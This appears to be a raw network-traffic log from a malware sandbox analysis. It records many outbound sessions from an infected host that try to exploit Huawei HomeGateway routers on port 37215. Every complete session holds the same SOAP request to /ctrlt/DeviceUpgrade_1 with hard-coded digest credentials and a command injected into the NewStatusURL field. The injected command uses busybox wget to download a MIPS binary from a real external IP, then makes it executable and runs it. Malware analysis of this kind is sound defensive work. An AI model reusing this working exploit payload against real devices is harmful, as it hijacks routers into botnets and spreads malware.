                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              418192.168.2.1534288121.173.24.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719002008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              419192.168.2.154700445.109.147.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719012022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              420192.168.2.153544431.61.84.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719041109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              421192.168.2.1534184138.252.194.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719060898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              422192.168.2.1550964122.72.185.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719075918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              423192.168.2.154509445.130.74.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719090939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              424192.168.2.1542922102.151.127.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719104052 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              425192.168.2.1543862122.17.231.14737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719127893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              426192.168.2.1545664138.175.159.16737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719127893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              427192.168.2.1536044181.19.161.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719141006 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              428192.168.2.154708677.45.53.8637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719158888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
